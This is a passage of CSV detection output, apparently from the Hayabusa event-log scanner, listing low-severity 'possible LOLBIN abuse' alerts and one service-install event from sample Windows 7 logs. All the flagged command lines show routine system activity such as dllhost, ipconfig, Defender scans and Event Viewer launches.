/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 10:44:32.463 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x584 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 18:48:21.079 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 18:48:21.686 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x10d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 18:48:21.710 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x15c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 18:48:40.739 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x87c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 18:53:51.556 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 20:00:00.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x12b0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 21:12:52.789 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x103c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 21:12:52.817 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x15b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 21:12:52.880 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x730 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 21:14:52.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x1790 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 02:31:58.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 